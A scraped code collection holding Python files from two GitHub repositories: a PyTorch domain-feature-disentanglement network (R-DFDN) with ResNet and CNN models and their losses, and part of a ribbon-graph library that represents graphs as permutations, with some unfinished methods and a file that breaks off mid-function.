n_train, n_val = int(nsamples), len(trainset)-int(nsamples)
else:
n_train = int((1. - val_fraction) * len(trainset))
n_val = len(trainset) - n_train
train_subset, val_subset = torch.utils.data.random_split(trainset, (n_train, n_val))
return train_subset, val_subset
class add_gaussian_noise():
    """Transform adding zero-mean Gaussian noise of fixed std to a tensor."""

    def __init__(self, std):
        self.std = std

    def __call__(self, x):
        return x + self.std * torch.randn_like(x)
|
{"/eval.py": ["/data.py"], "/existing_methods.py": ["/models.py", "/data.py", "/utils.py"], "/train_RDFDN.py": ["/RDFDN.py", "/utils.py", "/data.py"], "/data.py": ["/utils.py"], "/RDFDN.py": ["/utils.py", "/resnet_base.py", "/FALoss.py", "/endecoder.py"]}
|
27,824
|
Complicateddd/R-DFDN
|
refs/heads/master
|
/endecoder.py
|
import torch.nn as nn
import torch
class decoder(nn.Module):
    """Decode a 100-d feature vector into a 3x28x28 image.

    The FC layer expands to 588 = 3*14*14 features, reshaped to
    (3, 14, 14), then upsampled 2x through the conv stack to 28x28.
    """
    def __init__(self):
        super(decoder, self).__init__()
        self.fc = nn.Sequential(
            nn.Linear(100,588),
            nn.ReLU(True)
        )
        self.up=nn.Sequential(
            nn.Conv2d(3,16,kernel_size=3,stride=1,padding=1),
            nn.ReLU(),
            nn.Conv2d(16,16,3,stride=1,padding=1),
            nn.ReLU(),
            nn.Upsample(scale_factor=2),
            nn.Conv2d(16, 16, kernel_size=3, stride=1, padding=1),
            nn.ReLU(True),
        )
        # 1x1 conv maps the 16 feature channels back to RGB.
        self.out = nn.Conv2d(16,3,1)

    def forward(self, x):
        """x: (B, 100) -> reconstructed image (B, 3, 28, 28)."""
        out = self.fc(x)
        out = out.view(-1,3,14,14)
        out = self.up(out)
        out = self.out(out)
        return out
if __name__ == '__main__':
pass
|
{"/eval.py": ["/data.py"], "/existing_methods.py": ["/models.py", "/data.py", "/utils.py"], "/train_RDFDN.py": ["/RDFDN.py", "/utils.py", "/data.py"], "/data.py": ["/utils.py"], "/RDFDN.py": ["/utils.py", "/resnet_base.py", "/FALoss.py", "/endecoder.py"]}
|
27,825
|
Complicateddd/R-DFDN
|
refs/heads/master
|
/RDFDN.py
|
from utils import correlation_reg
from resnet_base import ResNet, MLPLayer
import torch
import torch.nn as nn
from FALoss import FALoss, DiffLoss
from endecoder import decoder
class R_DFDN(nn.Module):
    """Domain-feature-disentanglement network.

    Two ResNet-56 encoders: `inv_encoder` extracts domain-invariant
    features (shared across source and target), `diff_encoder` extracts
    target-specific features. Projection heads map the flattened encoder
    outputs to 100-d codes; a decoder reconstructs target images from the
    sum of the target's invariant and specific codes; two classifier
    heads predict classes for source and target.
    """
    def __init__(self, ):
        super(R_DFDN, self).__init__()
        # Shared-weight encoder applied to both domains.
        self.inv_encoder = ResNet(depth=56, nb_filters=16, num_classes=10, bn=False, kernel_size=3, inp_channels=3, k=1,
                                  affine=True, inp_noise=0)
        # Target-specific encoder.
        self.diff_encoder = ResNet(depth=56, nb_filters=16, num_classes=10, bn=False, kernel_size=3, inp_channels=3, k=1,
                                   affine=True, inp_noise=0)
        self.tar_de = decoder()
        self.classificator1 = nn.Sequential(
            nn.Linear(100,100),
            nn.ReLU(True),
            nn.Linear(100,10)
        )
        self.classificator2 = nn.Sequential(
            nn.Linear(100, 100),
            nn.ReLU(True),
            nn.Linear(100, 10)
        )
        # Projection heads: 64*7*7 flattened encoder features -> 100-d code.
        self.inv_source_diff = nn.Sequential(
            nn.Linear(64*7*7,100),
            nn.ReLU()
        )
        self.inv_tar_diff = nn.Sequential(
            nn.Linear(64 * 7 * 7, 100),
            nn.ReLU()
        )
        self.cha_tar_diff = nn.Sequential(
            nn.Linear(64 * 7 * 7, 100),
            nn.ReLU()
        )

    def forward(self, sourse_input, tar_input, is_generation=True, is_train=True):
        """Returns the full training tuple when is_train, otherwise the
        source prediction (is_generation) or target prediction."""
        # `hid` is the first-conv activation (ret_hid path of ResNet is not
        # used here; ResNet returns (logits-like, features) in this repo).
        hid, source_inv = self.inv_encoder(sourse_input)
        _, tar_inv = self.inv_encoder(tar_input)
        source_inv_diff = self.inv_source_diff(source_inv.view(source_inv.size(0),-1))
        tar_inv_diff = self.inv_tar_diff(tar_inv.view(tar_inv.size(0),-1))
        _, tar_diff = self.diff_encoder(tar_input)
        tar_cha_diff = self.cha_tar_diff(tar_diff.view(tar_diff.size(0),-1))
        # Reconstruct the target image from invariant + specific codes.
        tar_rec = self.tar_de(tar_inv_diff+tar_cha_diff)
        source_class = source_inv_diff
        # NOTE(review): uses source_inv_diff here, not tar_inv_diff — if the
        # target classifier is meant to see target-invariant features this
        # may be a typo; confirm against the paper/training script.
        tar_class = source_inv_diff + tar_cha_diff
        # For 2-D codes, view(..., -1) + mean over dim 2 is a no-op reshape.
        fc = torch.mean(source_class.view(source_class.size(0), source_class.size(1), -1), dim=2)
        fc = fc.view(fc.size()[0], -1)
        source_pred = self.classificator1((fc))
        fc2 = torch.mean(tar_class.view(tar_class.size(0), tar_class.size(1), -1), dim=2)
        fc2 = fc2.view(fc2.size()[0], -1)
        tar_pred = self.classificator2((fc2))
        if is_train:
            return hid, source_pred,tar_pred,source_inv_diff,tar_inv_diff,tar_cha_diff,tar_rec,source_inv,tar_inv
        elif is_generation:
            return source_pred
        else:
            return tar_pred
class Loss(nn.Module):
    """Aggregate R_DFDN training loss.

    Weighted sum of: hidden-activation correlation regularizer, source and
    target classification (cross-entropy), target reconstruction (L1),
    feature-affinity loss between the invariant features of the two
    domains, and a difference (orthogonality) loss between the target's
    invariant and specific codes.
    """
    def __init__(self):
        super(Loss, self).__init__()
        self.class_loss_criterion = nn.CrossEntropyLoss()
        self.class_loss_criterion2 = nn.CrossEntropyLoss()
        self.recognition_loss_criterion = nn.L1Loss()
        self.regulazation_loss_criterion = correlation_reg
        self.FA = FALoss()
        self.DIFF = DiffLoss()

    def forward(self, hid, source_pred,tar_pred,targets,source_inv_diff,tar_inv_diff,tar_cha_diff,tar_rec,tar_img,source_inv,tar_inv,
                weight_list=[0.1,1,1,0.1,0.1,0.1]):
        """Returns each term plus the weighted total (last element).

        weight_list order: [regularizer, source CE, target CE,
        reconstruction, feature-affinity, difference].
        """
        # correlation_reg expects numpy-compatible labels, hence .cpu().
        hid_1_loss = self.regulazation_loss_criterion(hid, targets.cpu(), within_class=True, subtract_mean=True)
        s_class_loss = self.class_loss_criterion(source_pred, targets)
        t_class_loss = self.class_loss_criterion2(tar_pred, targets)
        t_recognition_loss = self.recognition_loss_criterion(tar_rec, tar_img)
        fa_loss = self.FA(source_inv,tar_inv)
        t_diff_loss = self.DIFF(tar_inv_diff,tar_cha_diff)
        totol_loss = hid_1_loss * weight_list[0] + s_class_loss * weight_list[1] +t_class_loss * weight_list[2]\
                     +t_recognition_loss * weight_list[3]+fa_loss * weight_list[4] + t_diff_loss * weight_list[5]
        return hid_1_loss, s_class_loss, t_class_loss, t_recognition_loss,fa_loss,t_diff_loss,totol_loss
if __name__ == '__main__':
pass
|
{"/eval.py": ["/data.py"], "/existing_methods.py": ["/models.py", "/data.py", "/utils.py"], "/train_RDFDN.py": ["/RDFDN.py", "/utils.py", "/data.py"], "/data.py": ["/utils.py"], "/RDFDN.py": ["/utils.py", "/resnet_base.py", "/FALoss.py", "/endecoder.py"]}
|
27,826
|
Complicateddd/R-DFDN
|
refs/heads/master
|
/models.py
|
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
ACT = F.relu
class MLPLayer(nn.Module):
    """Linear layer with optional BatchNorm, dropout, and ReLU activation.

    Args:
        dim_in / dim_out: feature dimensions of the linear map.
        bn: truthy to append BatchNorm1d. Callers in this file pass the
            string 'none' to mean "no batchnorm" — previously that string
            was truthy and wrongly enabled batchnorm; it is now treated
            as disabled.
        act: apply ReLU after the layer stack.
        dropout: dropout probability applied after the linear map.
            Previously this argument was accepted but silently ignored.
        bias: whether the linear map has a bias term.
    """
    def __init__(self, dim_in=None, dim_out=None, bn=False, act=True, dropout=0., bias=True):
        super(MLPLayer, self).__init__()
        self.act = act
        layer = [nn.Linear(dim_in, dim_out, bias=bias)]
        # Fix: the 'none' sentinel must not enable batchnorm.
        if bn and bn != 'none':
            layer.append(nn.BatchNorm1d(dim_out))
        # Fix: honor the dropout argument (no-op when 0, the default).
        if dropout > 0:
            layer.append(nn.Dropout(dropout))
        self.layer = nn.Sequential(*layer)

    def forward(self, x):
        x = self.layer(x)
        if self.act:
            # ACT at module level is F.relu; call it directly here.
            x = F.relu(x)
        return x
class CNN(nn.Module):
    """4-conv-block image classifier with optional Variational
    Information Bottleneck (VIB) head.

    bn/affine control batchnorm usage, inp_noise adds Gaussian input
    noise during training, VIB inserts a stochastic 256-d bottleneck
    (via `reparameterize`) before the final classifier.
    """
    def __init__(self, bn=False, affine=True, num_classes=10, bias=False, kernel_size=3, inp_noise=0, VIB=False):
        super(CNN, self).__init__()
        self.VIB = VIB
        nhiddens = [200, 400, 600, 800]
        self.inp_noise = inp_noise
        self.conv1 = nn.Conv2d(3, nhiddens[0], kernel_size, 1, bias=bias)
        self.bn1 = nn.BatchNorm2d(nhiddens[0], affine=affine) if bn else nn.Sequential()
        self.conv2 = nn.Conv2d(nhiddens[0], nhiddens[1], 3, 1, bias=bias)
        self.bn2 = nn.BatchNorm2d(nhiddens[1], affine=affine) if bn else nn.Sequential()
        self.conv3 = nn.Conv2d(nhiddens[1], nhiddens[2], 3, 1, bias=bias)
        self.bn3 = nn.BatchNorm2d(nhiddens[2], affine=affine) if bn else nn.Sequential()
        self.conv4 = nn.Conv2d(nhiddens[2], nhiddens[3], 3, 1, bias=bias)
        self.bn4 = nn.BatchNorm2d(nhiddens[3], affine=affine) if bn else nn.Sequential()
        nb_filters_cur = nhiddens[3]
        if self.VIB:
            self.mn = MLPLayer(nb_filters_cur, 256, 'none', act=False, bias=bias)
            self.logvar = MLPLayer(nb_filters_cur, 256, 'none', act=False, bias=bias)
            nb_filters_cur = 256
        self.fc = MLPLayer(nb_filters_cur, num_classes, 'none', act=False, bias=bias)

    def forward(self, x, ret_hid=False, train=True):
        # Replicate a single-channel (MNIST) input to 3 channels.
        if x.size()[1] == 1:
            # Fix: allocate on the input's device/dtype instead of
            # hard-coded 'torch.cuda.FloatTensor', so CPU inputs work;
            # CUDA inputs behave exactly as before.
            ones = torch.ones(x.size(0), 3, x.size(2), x.size(3), device=x.device, dtype=x.dtype)
            x = ones * x
        if self.inp_noise > 0 and train:
            x = x + self.inp_noise * torch.randn_like(x)
        h = self.conv1(x)
        x = F.relu(self.bn1(h))
        x = F.max_pool2d(x, 2, 2)
        x = self.conv2(x)
        x = F.relu(self.bn2(x))
        x = self.conv3(x)
        x = F.relu(self.bn3(x))
        x = F.max_pool2d(x, 2, 2)
        x = self.conv4(x)
        x = F.relu(self.bn4(x))
        # Global average pool down to 1x1, then flatten.
        x = nn.AvgPool2d(*[x.size()[2]])(x)
        x = x.view(x.size()[0], -1)
        if self.VIB:
            mn = self.mn(x)
            logvar = self.logvar(x)
            x = reparameterize(mn, logvar)
        x = self.fc(x)
        if ret_hid:
            return x, h
        elif self.VIB and train:
            # Fix: previously returned `out`, which was undefined for
            # 3-channel inputs (NameError) and the channel-replication
            # buffer otherwise; the classifier output is `x`.
            return x, mn, logvar
        else:
            return x
class resblock(nn.Module):
    """Pre-activation residual block: (BN-ReLU-Conv) x2 plus a shortcut.

    The shortcut is the identity unless the block downsamples (stride > 1)
    or changes width, in which case a 1x1 projection conv (+ optional BN)
    is used.
    """

    def __init__(self, depth, channels, stride=1, bn='', nresblocks=1., affine=True, kernel_size=3, bias=True):
        # Plain int attributes are safe to set before Module.__init__.
        self.depth = depth
        self.channels = channels
        super(resblock, self).__init__()
        self.bn1 = nn.BatchNorm2d(depth, affine=affine) if bn else nn.Sequential()
        self.conv2 = nn.Conv2d(depth, channels, kernel_size=kernel_size, stride=stride, padding=1, bias=bias)
        self.bn2 = nn.BatchNorm2d(channels, affine=affine) if bn else nn.Sequential()
        self.conv3 = nn.Conv2d(channels, channels, kernel_size=kernel_size, stride=1, padding=1, bias=bias)
        if stride > 1 or depth != channels:
            projection = nn.Conv2d(depth, channels, kernel_size=1, stride=stride, padding=0, bias=bias)
            norm = nn.BatchNorm2d(channels, affine=affine) if bn else nn.Sequential()
            self.shortcut = nn.Sequential(projection, norm)
        else:
            self.shortcut = nn.Sequential()

    def forward(self, x):
        out = ACT(self.bn1(x))
        out = ACT(self.bn2(self.conv2(out)))
        out = self.conv3(out)
        return out + 1. * self.shortcut(x)
class ResNet(nn.Module):
    """Pre-activation ResNet (depth 6n+2) with optional VIB head.

    3 stages of n resblocks each; widths scale with `k`. Forward returns
    (logits, first-conv-activation) when ret_hid, (logits, mn, logvar)
    when VIB and training, else logits.
    """
    def __init__(self, depth=56, nb_filters=16, num_classes=10, bn=False, affine=True, kernel_size=3, inp_channels=3, k=1, pad_conv1=0, bias=False, inp_noise=0, VIB=False): # n=9->Resnet-56
        super(ResNet, self).__init__()
        self.inp_noise = inp_noise
        self.VIB = VIB
        nstage = 3
        self.pre_clf=[]
        assert ((depth-2)%6 ==0), 'resnet depth should be 6n+2'
        n = int((depth-2)/6)
        # Per-stage widths; last entry is the classifier output size.
        nfilters = [nb_filters, nb_filters*k, 2* nb_filters*k, 4* nb_filters*k, num_classes]
        self.nfilters = nfilters
        self.num_classes = num_classes
        self.conv1 = (nn.Conv2d(inp_channels, nfilters[0], kernel_size=kernel_size, stride=1, padding=pad_conv1, bias=bias))
        self.bn1 = nn.BatchNorm2d(nfilters[0], affine=affine) if bn else nn.Sequential()
        nb_filters_prev = nb_filters_cur = nfilters[0]
        for stage in range(nstage):
            nb_filters_cur = nfilters[stage+1]
            for i in range(n):
                # Downsample (stride 2) only at the first block of stages 1 and 2.
                subsample = 1 if (i > 0 or stage == 0) else 2
                layer = resblock(nb_filters_prev, nb_filters_cur, subsample, bn=bn, nresblocks = nstage*n, affine=affine, kernel_size=3, bias=bias)
                self.pre_clf.append(layer)
                nb_filters_prev = nb_filters_cur
        self.pre_clf = nn.Sequential(*self.pre_clf)
        if self.VIB:
            # Variational bottleneck: mean and log-variance heads feeding
            # the reparameterization trick before the classifier.
            self.mn = MLPLayer(nb_filters_cur, 256, 'none', act=False, bias=bias)
            self.logvar = MLPLayer(nb_filters_cur, 256, 'none', act=False, bias=bias)
            nb_filters_cur = 256
        self.fc = MLPLayer(nb_filters_cur, nfilters[-1], 'none', act=False, bias=bias)

    def forward(self, x, ret_hid=False, train=True):
        if x.size()[1]==1: # if MNIST is given, replicate 1 channel to make input have 3 channel
            # NOTE(review): hard-coded CUDA tensor type — fails on CPU-only runs.
            out = torch.ones(x.size(0), 3, x.size(2), x.size(3)).type('torch.cuda.FloatTensor')
            out = out*x
        else:
            out = x
        if self.inp_noise>0 and train:
            out = out + self.inp_noise*torch.randn_like(out)
        hid = self.conv1(out)
        out = self.bn1(hid)
        out = self.pre_clf(out)
        # Global average pool over spatial positions, then flatten.
        fc = torch.mean(out.view(out.size(0), out.size(1), -1), dim=2)
        fc = fc.view(fc.size()[0], -1)
        if self.VIB:
            mn = self.mn(fc)
            logvar = self.logvar(fc)
            fc = reparameterize(mn,logvar)
        out = self.fc((fc))
        if ret_hid:
            return out, hid
        elif self.VIB and train:
            return out, mn, logvar
        else:
            return out
# Resnet nomenclature: 6n+2 = 3x2xn + 2; 3 stages, each with n number of resblocks containing 2 conv layers each, and finally 2 non-res conv layers
def ResNet_model(bn=False, num_classes=10, depth=56, nb_filters=16, kernel_size=3, inp_channels=3, k=1, pad_conv1=0, affine=True, inp_noise=0, VIB=False):
    """Convenience constructor for ResNet (depth must be 6n+2)."""
    return ResNet(
        depth=depth,
        nb_filters=nb_filters,
        num_classes=num_classes,
        bn=bn,
        kernel_size=kernel_size,
        inp_channels=inp_channels,
        k=k,
        pad_conv1=pad_conv1,
        affine=affine,
        inp_noise=inp_noise,
        VIB=VIB,
    )
def reparameterize(mu, logvar):
    """Sample from N(mu, exp(logvar)) via the reparameterization trick."""
    sigma = torch.exp(0.5 * logvar)
    return mu + torch.randn_like(sigma) * sigma
|
{"/eval.py": ["/data.py"], "/existing_methods.py": ["/models.py", "/data.py", "/utils.py"], "/train_RDFDN.py": ["/RDFDN.py", "/utils.py", "/data.py"], "/data.py": ["/utils.py"], "/RDFDN.py": ["/utils.py", "/resnet_base.py", "/FALoss.py", "/endecoder.py"]}
|
27,852
|
malikobeidin/ribbon_graph
|
refs/heads/master
|
/ribbon_graph_base.py
|
from sage.all import PermutationGroup
from permutation import Permutation, Bijection, random_permutation
from cycle import Path, EmbeddedPath, EmbeddedCycle
from spherogram.links.random_links import map_to_link, random_map
from random import choice
import itertools
class RibbonGraph(object):
"""
A RibbonGraph consists of a pair of permutations on a set of labels.
Each label corresponds to a half-edge, and the permutations 'opposite' and
'next' determine how the half-edges are connected to one another.
'opposite' determines which half-edge is on the opposite side of the same
edge. 'next' determines which half-edge is the next counterclockwise
half-edge on the same vertex.
"""
def __init__(self, permutations=[], PD = []):
if permutations:
opposite, next = permutations
if PD:
opposite, next = self._permutations_from_PD(PD)
self.opposite = opposite
self.next = next
def __repr__(self):
return "RibbonGraph with {} half-edges and {} vertices".format(self.size(), len(self.vertices()))
    def _permutations_from_PD(self, PD):
        """Build the (opposite, next) permutations from a planar diagram.

        PD is a list of vertices, each a sequence of edge labels in cyclic
        order; every edge label appears exactly twice overall. Positions
        (vertex index, slot index) are numbered 1..n and become half-edge
        labels.
        """
        # Map each edge label to the (vertex, slot) positions where it occurs.
        edge_dict = {}
        for n,v in enumerate(PD):
            for m,label in enumerate(v):
                if label in edge_dict:
                    edge_dict[label].append((n,m))
                else:
                    edge_dict[label] = [(n,m)]
        positions = []
        for l in edge_dict.values():
            positions.extend(l)
        # 'opposite' pairs the two occurrences of each edge label (1-based).
        opposite_list = [[positions.index(pair)+1 for pair in edge_dict[label]] for label in edge_dict ]
        next_list = []
        # 'next' cycles through the slots of each vertex in order.
        for n,v in enumerate(PD):
            cycle = []
            for m,label in enumerate(v):
                cycle.append(positions.index((n,m))+1)
            next_list.append(cycle)
        opposite = Permutation(dictionary={},cycles = opposite_list)
        next = Permutation(dictionary={},cycles = next_list)
        return opposite,next
    def _vertex_search(self, label):
        """
        Starting with an oriented half edge label, traverse all vertices to
        give a canonical ordering of the vertices and a choice of oriented
        half edge for each vertex.

        NOTE(review): the original docstring said "breadth first", but the
        LIFO stack makes this a depth-first traversal; the canonical order
        is still deterministic.
        """
        all_seen_edges = set()
        first_edges = []
        stack = []
        stack.append(label)
        num_labels = self.size()
        # Stop early once every half-edge has been seen.
        while stack and len(all_seen_edges) < num_labels:
            oriented_edge = stack.pop()
            if oriented_edge not in all_seen_edges:
                first_edges.append(oriented_edge)
                for label in self.vertex(oriented_edge):
                    all_seen_edges.add(label)
                    # Cross each edge to reach the neighboring vertex.
                    stack.append(self.opposite[label])
        return first_edges
def _cache_next_corner(self):
self.next_corner = self.opposite * self.next.inverse()
    def next_corner(self):
        """
        next_corner is the permutation that determines the faces of the
        ribbon_graph. The permutation records the order of labels around
        a face, oriented so that the face is to the left of the sequence
        of half edge labels.

        Recomputed on every call (opposite composed with next-inverse).
        """
        return self.opposite * self.next.inverse()
def connected_component(self, label):
"""
Return all labels in the connected component of label. That is, all
labels which can be reached by applying the permutations opposite and
next.
"""
verts = self._vertex_search(label)
return set([l for v in verts for l in self.vertex(v)])
def connected_components(self):
"""
Return all connected components.
"""
labels = self.next.labels()
conn_comps = []
while labels:
label = labels.pop()
comp = self.connected_component(label)
labels = labels-comp
conn_comps.append(comp)
return conn_comps
def restricted_to_connected_component_containing(self, label):
"""
Return a RibbonGraph (not just a set of labels) corresponding to the
connected component containing label.
"""
comp = self.connected_component(label)
new_op = self.opposite.restricted_to(comp)
new_next = self.next.restricted_to(comp)
return RibbonGraph([new_op, new_next])
def connected_components_as_ribbon_graphs(self):
label_choices = [c.pop() for c in self.connected_components()]
return [self.restricted_to_connected_component_containing(l) for l in label_choices]
def _relabeling_bijection(self, label):
i = 1
bij = {}
for oriented_edge in self._vertex_search(label):
for e in self.vertex(oriented_edge):
bij[e]=i
i += 1
return Bijection(bij)
def relabeled_by_root(self, label):
"""
Change the labels so that they are ordered in a canonical way from
RibbonGraph._vertex_search starting at label.
"""
bij = self._relabeling_bijection(label)
new_op = self.opposite.relabeled(bij)
new_next = self.next.relabeled(bij)
return RibbonGraph([new_op, new_next])
def rooted_isomorphism_signature(self, label):
"""
Returns a list of information which determines the RibbonGraph up to
rooted isomorphism with root label. That is to say, if another
RibbonGraph and one if its edges returns the same list of information,
the two RibbonGraphs are isomorphic to each other in such a way that
the roots correspond to one another as well.
"""
edges = self.relabeled_by_root(label).edges()
return sorted([sorted(e) for e in edges])
def isomorphism_signature(self):
"""
Return a list of information which determines the isomorphism type
of the RibbonGraph.
"""
return min(self.rooted_isomorphism_signature(label) for label in self.labels())
    def vertex(self, label):
        """
        The vertex containing label: the cyclic orbit of `label` under
        the 'next' permutation.
        """
        return self.next.cycle(label)
    def vertices(self):
        """All vertices, as the cycles of the 'next' permutation."""
        return self.next.cycles()
    def edge(self, label):
        """
        The edge containing label: the orbit of `label` under 'opposite'.
        """
        return self.opposite.cycle(label)
    def edges(self):
        """All edges, as the cycles of the 'opposite' permutation."""
        return self.opposite.cycles()
    def face(self, label):
        """
        The face containing label. The faces are oriented so that the
        sequence of labels has the face to their LEFT side.

        Note: recomputes the full next_corner permutation each call; this
        could be redone so as to not compute next_corner entirely.
        """
        return self.next_corner().cycle(label)
    def faces(self):
        """All faces, as the cycles of the next_corner permutation."""
        return self.next_corner().cycles()
    def euler_characteristic(self):
        """V - E + F for the surface the ribbon graph is embedded in."""
        return len(self.vertices()) - len(self.edges()) + len(self.faces())
    def lace_component(self, label):
        """Orbit of `label` under the composition opposite*next*next."""
        return (self.opposite*self.next*self.next).cycle(label)
    def lace_components(self):
        """All cycles of the composition opposite*next*next."""
        return (self.opposite*self.next*self.next).cycles()
    def size(self):
        """Number of half-edge labels in the graph."""
        return len(self.opposite)
def make_new_labels(self, num_labels):
max_int_label = 0
for j in self.labels():
try:
j_int = int(j)
if j_int > max_int_label:
max_int_label = j_int
except (ValueError, TypeError):
try:
j_int = int(max(j))
if j_int > max_int_label:
max_int_label = j_int
except:
continue
return range(max_int_label + 1, max_int_label + 1 + num_labels)
    def dual(self):
        """
        Return the dual RibbonGraph, i.e. the RibbonGraph where the vertices
        are the faces of the original, and the edges correspond to edges of
        the original.

        The dual of the dual is NOT exactly the original: it is the original
        with all labels switched with their opposites — that is, the 'next'
        permutation conjugated by the 'opposite' permutation.
        """
        return RibbonGraph(permutations=[self.opposite, self.next_corner()])
    def mirror(self):
        """
        Return the mirror image of the RibbonGraph, which has the same edges
        but in the reverse cyclic order around each vertex.
        """
        return RibbonGraph(permutations=[self.opposite, self.next.inverse()])
    def labels(self):
        """All half-edge labels (used with set operations elsewhere)."""
        return self.opposite.labels()
def with_shuffled_labels(self):
bijection = random_permutation(self.labels())
new_opposite = self.opposite.relabeled(bijection)
new_next = self.next.relabeled(bijection)
return RibbonGraph(permutations=[new_opposite, new_next])
def relabeled(self):
labels = list(self.labels())
indices = {l:i for i,l in enumerate(labels)}
new_op = Permutation({i:indices[self.opposite[labels[i]]] for i in range(len(labels))})
new_next = Permutation({i:indices[self.next[labels[i]]] for i in range(len(labels))})
return RibbonGraph([new_op,new_next])
    def disconnect_edges(self, labels):
        """
        Given list of half edges, disconnect the corresponding edges.
        Every touched half-edge becomes a fixed point of 'opposite'
        (a dangling half-edge); 'next' is left untouched.
        """
        opposite_labels = set(self.opposite[label] for label in labels)
        all_labels = set(labels).union(opposite_labels)
        new_op = self.opposite.restricted_to(self.opposite.labels()-all_labels)
        for label in all_labels:
            # Re-insert each label as its own partner (fixed point).
            new_op[label] = label
        return RibbonGraph([new_op, self.next])
    def disconnect_vertices(self, labels):
        """
        Given list of half edges, pull off the labels at each vertex.
        Implemented by composing 'next' with a transposition per label,
        which splices the label out of its vertex cycle; the composition
        is order-dependent, so new_next is rebuilt incrementally.
        """
        label_set = set(labels)
        new_next = self.next
        for label in label_set:
            switch_perm = Permutation({label:new_next[label],new_next[label]:label })
            new_next = new_next * switch_perm
        return RibbonGraph([self.opposite, new_next])
def delete_edges(self, labels):
"""
Given a list of labels, delete the entire edge that each label in the
list in on.
"""
labels = set(labels)
labels_with_opposite_labels = set()
for label in labels:
for other_label in self.edge(label):
labels_with_opposite_labels.add(other_label)
return self.delete_labels(labels_with_opposite_labels)
def delete_vertices(self, labels):
"""
Given a list of labels, delete the entire vertex that each label in the
list in on.
"""
labels = set(labels)
labels_with_next_labels = set()
for label in labels:
for other_label in self.vertex(label):
labels_with_next_labels.add(other_label)
return self.delete_labels(labels_with_next_labels)
    def delete_labels(self, labels):
        """Fully remove `labels`: detach them from their edges and vertices,
        then drop them from the underlying permutations.

        NOTE(review): relies on a `remove_labels` method not visible in
        this chunk of the file.
        """
        return self.disconnect_edges(labels).disconnect_vertices(labels).remove_labels(labels)
    def connect_edges(self, pairing):
        """
        Given a list of pairs of half-edge labels which are currently
        disconnected (fixed points of self.opposite), connect the half-edges
        up. If one of the labels is already connected, it raises an
        exception.
        """
        connecting_permutation = Permutation(cycles=pairing)
        all_labels = connecting_permutation.labels()
        # Refuse to overwrite an existing connection.
        for label in connecting_permutation.labels():
            if self.opposite[label] != label:
                raise Exception("Trying to connect already connected half edge")
        new_op = self.opposite.restricted_to(self.opposite.labels()-all_labels)
        return RibbonGraph([new_op*connecting_permutation, self.next])
    def disjoint_union(self, other_ribbon_graph):
        """Disjoint union of two ribbon graphs; label disambiguation is
        delegated to Permutation.disjoint_union."""
        new_op = self.opposite.disjoint_union(other_ribbon_graph.opposite)
        new_next = self.next.disjoint_union(other_ribbon_graph.next)
        return RibbonGraph([new_op, new_next])
    def glue_along_vertex(self, label, other_ribbon_graph, other_label):
        """Glue self to other_ribbon_graph along the vertices containing
        `label` and `other_label`.

        NOTE(review): only the size check is implemented — the method
        currently validates and then returns None without gluing.
        """
        vertex = self.vertex(label)
        other_vertex = other_ribbon_graph.vertex(other_label)
        if len(vertex) != len(other_vertex):
            raise Exception("Must glue along two vertices of same size")
    def union(self, other_ribbon_graph):
        """
        Combine self and other_ribbon_graph, without forcing the labels to
        be different as in disjoint_union (shared labels are merged).
        """
        new_opposite = self.opposite.union(other_ribbon_graph.opposite)
        new_next = self.next.union(other_ribbon_graph.next)
        return RibbonGraph([new_opposite, new_next])
    def glue_along_face(self, label, other_ribbon_graph, other_label):
        """
        Given two embedded faces (no vertex is encountered twice when walking
        around boundary) of the same size on two different ribbon graphs,
        glue along that boundary cycle so that label in self ends up
        connected to (an opposite) other_label in other_ribbon_graph.

        NOTE(review): labels in the disjoint union appear tagged as
        (label, 0)/(label, 1) below — relies on vertex_merge_unmerge and
        the disjoint-union labeling convention, neither visible in this
        chunk; confirm against the Permutation implementation.
        """
        face_length = len(self.face(label))
        if len(other_ribbon_graph.face(other_label)) != face_length:
            raise Exception("Faces must have same size")
        # Walk both face boundaries; the other cycle is reversed so the
        # orientations match up when gluing.
        cycle = EmbeddedCycle(self, label, turn_degrees = [-1]*face_length)
        other_cycle = EmbeddedCycle(other_ribbon_graph, other_label, turn_degrees = [-1]*face_length).reversed()
        union_ribbon_graph = self.disjoint_union(other_ribbon_graph)
        for l, ol in zip(cycle.labels[:-1], other_cycle.labels[:-1]):
            nl, nol = self.next[l], other_ribbon_graph.next[ol]
            #the following function glues two vertices in the slots BEFORE
            #the given labels. So, need to shift them by one first, as above.
            union_ribbon_graph = union_ribbon_graph.vertex_merge_unmerge((nl,0),(nol,1) )
        #Edges on mutual boundary are now doubled, need to cut half of them.
        #we cut the ones from other_ribbon_graph, as a convention.
        doubled_edges = []
        for ol in other_cycle.labels[:-1]:
            doubled_edges.append((ol,1))
            doubled_edges.append((other_ribbon_graph.opposite[ol],1))
        union_ribbon_graph = union_ribbon_graph.delete_labels(doubled_edges)
        return union_ribbon_graph
def glue_faces(self, label, other_label):
    """
    Given two embedded faces (no vertex is encountered twice when walking
    around boundary) of the same size on the SAME ribbon graph, glue along
    that boundary cycle so that label ends up connected to (an opposite)
    other_label.
    """
    face_length = len(self.face(label))
    if len(self.face(other_label)) != face_length:
        raise Exception("Faces must have same size")
    cycle = EmbeddedCycle(self, label, turn_degrees = [-1]*face_length)
    other_cycle = EmbeddedCycle(self, other_label, turn_degrees = [-1]*face_length).reversed()
    #union_ribbon_graph = self.disjoint_union(self)
    for l, ol in zip(cycle.labels[:-1], other_cycle.labels[:-1]):
        # NOTE: self is rebound each iteration, but nl/nol are read from the
        # current self.next before the rebinding.
        nl, nol = self.next[l], self.next[ol]
        #the following function glues two vertices in the slots BEFORE
        #the given labels. So, need to shift them by one first, as above.
        self = self.vertex_merge_unmerge(nl,nol)
    #Edges on mutual boundary are now doubled, need to cut half of them.
    #we cut the ones from self, as a convention.
    doubled_edges = []
    for ol in other_cycle.labels[:-1]:
        doubled_edges.append(ol)
        doubled_edges.append(self.opposite[ol])
    # NOTE(review): delete_labels is not defined in this view; this file
    # also defines remove_labels — confirm delete_labels exists elsewhere.
    return self.delete_labels(doubled_edges)
def add_new_vertices(self, vertex_labels, vertex_size):
    """
    Add a new vertex for each label in vertex_labels, with each vertex
    having size vertex_size. The half edges around the vertex
    corresponding to l will be labeled (l,0),(l,1),...(l,vertex_size-1).
    They are not yet connected to any other vertices.
    """
    # New half-edges begin as fixed points of the opposite permutation.
    identity_on_new = Permutation({(l, i): (l, i)
                                   for l in vertex_labels
                                   for i in range(vertex_size)})
    vertex_cycles = [[(l, i) for i in range(vertex_size)] for l in vertex_labels]
    new_op = self.opposite * identity_on_new
